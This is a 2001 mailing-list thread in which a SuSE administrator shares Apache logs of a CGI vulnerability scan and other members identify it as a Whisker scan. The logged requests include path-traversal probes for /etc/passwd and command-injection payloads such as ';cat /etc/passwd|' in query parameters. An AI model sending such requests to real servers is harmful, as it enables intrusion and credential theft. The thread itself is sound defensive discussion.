Any cgi vulnarabilities that I missed
This is what I have in my logs I just put the this guy with his /27 ipblock to return-rst chain but I want to make sure I have no vulnarabilities. The guy/girl also did a port scan with a lot of SuSE7.1 running Apache 1.3.19 with all uptodate with regards to SuSE security announcements. Is there a need to check anything else because I was planning to get mod_perl installed with cgi-bin enabled (now I need to think again) -- Togan Muftuoglu 212.174.224.28 - - [15/Nov/2001:10:59:38 +0200] "HEAD /cgi-bin/ HTTP/1.0" 403 0 212.174.224.28 - - [15/Nov/2001:10:59:38 +0200] "HEAD /cgi-bin/ad.cgi HTTP/1.0" 404 0 212.174.224.28 - - [15/Nov/2001:10:59:38 +0200] "HEAD /cgi-bin/aglimpse HTTP/1.0" 404 0 212.174.224.28 - - [15/Nov/2001:10:59:38 +0200] "HEAD /cgi-bin/AnyForm2 HTTP/1.0" 404 0 212.174.224.28 - - [15/Nov/2001:10:59:39 +0200] "HEAD /cgi-bin/bbs_forum.cgi HTTP/1.0" 404 0 212.174.224.28 - - [15/Nov/2001:10:59:39 +0200] "HEAD /cgi-bin/bsguest.cgi HTTP/1.0" 404 0 212.174.224.28 - - [15/Nov/2001:10:59:39 +0200] "HEAD /cgi-bin/bslist.cgi HTTP/1.0" 404 0 212.174.224.28 - - [15/Nov/2001:10:59:39 +0200] "HEAD /cgi-bin/campas HTTP/1.0" 404 0 212.174.224.28 - - [15/Nov/2001:10:59:39 +0200] "HEAD /// HTTP/1.0" 200 0 212.174.224.28 - - [15/Nov/2001:10:59:39 +0200] "HEAD ///carbo.ddl HTTP/1.0" 404 0 212.174.224.28 - - [15/Nov/2001:10:59:40 +0200] "HEAD /cgi-bin/count.cgi HTTP/1.0" 404 0 212.174.224.28 - - [15/Nov/2001:10:59:40 +0200] "HEAD /cgi-bin/cgforum.cgi HTTP/1.0" 404 0 212.174.224.28 - - [15/Nov/2001:10:59:40 +0200] "HEAD /cgi-bin/faxsurvey HTTP/1.0" 404 0 212.174.224.28 - - [15/Nov/2001:10:59:40 +0200] "HEAD /cgi-bin/gbook.cgi HTTP/1.0" 404 0 212.174.224.28 - - [15/Nov/2001:10:59:40 +0200] "HEAD /cgi-bin/htsearch HTTP/1.0" 404 0 212.174.224.28 - - [15/Nov/2001:10:59:40 +0200] "HEAD /cgi-bin/htmlscript HTTP/1.0" 404 0 212.174.224.28 - - [15/Nov/2001:10:59:40 +0200] "HEAD /cgi-bin/jj HTTP/1.0" 404 0 212.174.224.28 - - [15/Nov/2001:10:59:41 +0200] "HEAD /technote/ HTTP/1.0" 404 0 212.174.224.28 - - [15/Nov/2001:10:59:41 +0200] "HEAD /cgi-bin/mmstdod.cgi HTTP/1.0" 404 0 212.174.224.28 - - [15/Nov/2001:10:59:41 +0200] "HEAD /cgi-bin/newdesk HTTP/1.0" 404 0 212.174.224.28 - - [15/Nov/2001:10:59:41 +0200] "HEAD /cgi-bin/register.cgi HTTP/1.0" 404 0 212.174.224.28 - - [15/Nov/2001:10:59:41 +0200] "HEAD /cgi-bin/simplestguest.cgi HTTP/1.0" 404 0 212.174.224.28 - - [15/Nov/2001:10:59:42 +0200] "HEAD /cgi-bin/statusconfig.pl HTTP/1.0" 404 0 212.174.224.28 - - [15/Nov/2001:10:59:42 +0200] "HEAD /cgi-bin/webgais HTTP/1.0" 404 0 212.174.224.28 - - [15/Nov/2001:10:59:42 +0200] "HEAD /iisadmpwd/ HTTP/1.0" 404 0 212.174.224.28 - - [15/Nov/2001:10:59:43 +0200] "HEAD /cgi-bin/perl.exe HTTP/1.0" 404 0 212.174.224.28 - - [15/Nov/2001:10:59:43 +0200] "HEAD /cgi-dos/ HTTP/1.0" 404 0 212.174.224.28 - - [15/Nov/2001:10:59:43 +0200] "HEAD /scripts/ HTTP/1.0" 404 0 212.174.224.28 - - [15/Nov/2001:10:59:43 +0200] "HEAD /cgi-bin/infosrch.cgi HTTP/1.0" 404 0 212.174.224.28 - - [15/Nov/2001:10:59:43 +0200] "HEAD /cgi-bin/rguest.exe HTTP/1.0" 404 0 212.174.224.28 - - [15/Nov/2001:10:59:43 +0200] "HEAD /mall_log_files/ HTTP/1.0" 404 0 212.174.224.28 - - [15/Nov/2001:10:59:44 +0200] "HEAD /cgi-bin/ezshopper2/loadpage.cgi HTTP/1.0" 404 0 212.174.224.28 - - [15/Nov/2001:10:59:44 +0200] "HEAD /Admin_files/ HTTP/1.0" 404 0 212.174.224.28 - - [15/Nov/2001:10:59:44 +0200] "GET ///quote.html HTTP/1.0" 404 206 212.174.224.28 - - [15/Nov/2001:10:59:44 +0200] "GET /cgi-bin/cal_make.pl?p0=../../../../../../../../../../../../etc/passwd%00 HTTP/1.0" 404 213 212.174.224.28 - - [15/Nov/2001:10:59:44 +0200] "HEAD /cgi-bin/dcboard.cgi HTTP/1.0" 404 0 212.174.224.28 - - [15/Nov/2001:10:59:44 +0200] "GET /cgi-bin/nph-maillist.pl HTTP/1.0" 404 217 212.174.224.28 - - [15/Nov/2001:10:59:45 +0200] "GET /cgi-bin/talkback.cgi?article=../../../../../../../../etc/passwd%00&action=view&matchview=1 HTTP/1.0" 404 214 212.174.224.28 - - [15/Nov/2001:10:59:45 +0200] "GET /cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd HTTP/1.0" 404 217 212.174.224.28 - - [15/Nov/2001:10:59:45 +0200] "HEAD /cgi-bin/ikonboard/ HTTP/1.0" 404 0 212.174.224.28 - - [15/Nov/2001:10:59:46 +0200] "HEAD /foldoc/ HTTP/1.0" 404 0 212.174.224.28 - - [15/Nov/2001:10:59:46 +0200] "HEAD /cgi-bin/adcycle/ HTTP/1.0" 404 0 212.174.224.28 - - [15/Nov/2001:10:59:46 +0200] "GET /cgi-bin/store.cgi?StartID=../etc/passwd%00.html HTTP/1.0" 404 211 212.174.224.28 - - [15/Nov/2001:10:59:46 +0200] "HEAD /cgi-bin/commerce.cgi?page=../../../../etc/hosts%00index.html HTTP/1.0" 404 0 212.174.224.28 - - [15/Nov/2001:10:59:46 +0200] "GET /cgi-bin/auktion.pl?menue=../../../../../../../../../../../../../etc/passwd HTTP/1.0" 404 212 212.174.224.28 - - [15/Nov/2001:10:59:47 +0200] "GET /cgi-bin/hsx.cgi?show=../../../../../../etc/passwd%00 HTTP/1.0" 404 209 212.174.224.28 - - [15/Nov/2001:10:59:47 +0200] "HEAD /cgi-bin/mailnews.cgi HTTP/1.0" 404 0 212.174.224.28 - - [15/Nov/2001:10:59:47 +0200] "HEAD /cgi-bin/newsdesk.cgi HTTP/1.0" 404 0 212.174.224.28 - - [15/Nov/2001:10:59:47 +0200] "HEAD /cgi-bin/pals-cgi HTTP/1.0" 404 0 212.174.224.28 - - [15/Nov/2001:10:59:47 +0200] "HEAD /ROADS/ HTTP/1.0" 404 0 212.174.224.28 - - [15/Nov/2001:10:59:47 +0200] "GET /cgi-bin/sendtemp.pl?templ=../../etc/passwd HTTP/1.0" 404 213 212.174.224.28 - - [15/Nov/2001:10:59:48 +0200] "HEAD /way-board/ HTTP/1.0" 404 0 212.174.224.28 - - [15/Nov/2001:10:59:48 +0200] "GET /cgi-bin/webspirs.cgi?sp.nextform=../../../../../../etc/passwd HTTP/1.0" 404 214 212.174.224.28 - - [15/Nov/2001:10:59:48 +0200] "HEAD /cgi-bin/DCShop/Orders/orders.txt HTTP/1.0" 404 0 212.174.224.28 - - [15/Nov/2001:10:59:48 +0200] "HEAD /cgi-bin/a1disp3.cgi?/../../../../../../etc/passwd HTTP/1.0" 404 0 212.174.224.28 - - [15/Nov/2001:10:59:49 +0200] "HEAD /cgi-bin/a1stats/ HTTP/1.0" 404 0 212.174.224.28 - - [15/Nov/2001:10:59:49 +0200] "GET /cgi-bin/get32.exe HTTP/1.0" 404 211 212.174.224.28 - - [15/Nov/2001:10:59:49 +0200] "GET /cgi-bin/auktion.cgi?menue=../../../../../../../../../etc/passwd HTTP/1.0" 404 213 212.174.224.28 - - [15/Nov/2001:10:59:49 +0200] "GET ///index.php?chemin=..%2F..%2F..%2F..%2F..%2F..%2Fetc HTTP/1.0" 404 205 212.174.224.28 - - [15/Nov/2001:10:59:49 +0200] "GET /cgi-bin/index.php?chemin=..%2F..%2F..%2F..%2F..%2F..%2Fetc HTTP/1.0" 404 211 212.174.224.28 - - [15/Nov/2001:10:59:49 +0200] "GET ///edit_image.php?dn=1&userfile=/etc/passwd&userfile_name=%20;ls;%20 HTTP/1.0" 404 210 212.174.224.28 - - [15/Nov/2001:10:59:50 +0200] "GET /cgi-bin/eshop.pl?seite=;cat%20/etc/passwd| HTTP/1.0" 404 210
This is what I have in my logs I just put the this guy with his /27 ipblock to return-rst chain but I want to make sure I have no vulnarabilities. The guy/girl also did a port scan with a lot of
SuSE7.1 running Apache 1.3.19 with all uptodate with regards to SuSE security announcements.
Is there a need to check anything else because I was planning to get mod_perl installed with cgi-bin enabled (now I need to think again)
212.174.224.28 - - [15/Nov/2001:10:59:38 +0200] "HEAD /cgi-bin/ad.cgi HTTP/1.0" 404 0 212.174.224.28 - - [15/Nov/2001:10:59:38 +0200] "HEAD /cgi-bin/aglimpse HTTP/1.0" 404 0
Seems to be nice scan output like produced by rain forest puppys cgi vuln scanner. To secure your webserver think about linux virtual server projekt : ask google chroot jail for web server : ask http://www.suse.com/~marc/SuSE.html Mfg Appeldorn
On Thu, 15 Nov 2001 11:13:12 +0100
"Michael Appeldorn"
This is what I have in my logs I just put the this guy with his /27 ipblock to return-rst chain but I want to make sure I have no vulnarabilities. The guy/girl also did a port scan with a lot of
SuSE7.1 running Apache 1.3.19 with all uptodate with regards to SuSE security announcements.
Is there a need to check anything else because I was planning to get mod_perl installed with cgi-bin enabled (now I need to think again)
212.174.224.28 - - [15/Nov/2001:10:59:38 +0200] "HEAD /cgi-bin/ad.cgi HTTP/1.0" 404 0 212.174.224.28 - - [15/Nov/2001:10:59:38 +0200] "HEAD /cgi-bin/aglimpse HTTP/1.0" 404 0
Seems to be nice scan output like produced by rain forest puppys cgi vuln scanner.
To secure your webserver think about
linux virtual server projekt : ask google chroot jail for web server : ask http://www.suse.com/~marc/SuSE.html
Yup, looks like a whisker scan to me... -- Viel Spaß Nix - nix@susesecurity.com http://www.susesecurity.com
* Peter Nixon;
Yup, looks like a whisker scan to me...
Thanks for confirming my search which ended with whisker (should have checked the snort logs and found the bugtraq and CVE referencences Now need to find some documentation regarding compartment and apache bye and thanks -- Togan Muftuoglu
participants (3)
-
Michael Appeldorn
-
Peter Nixon
-
Togan Muftuoglu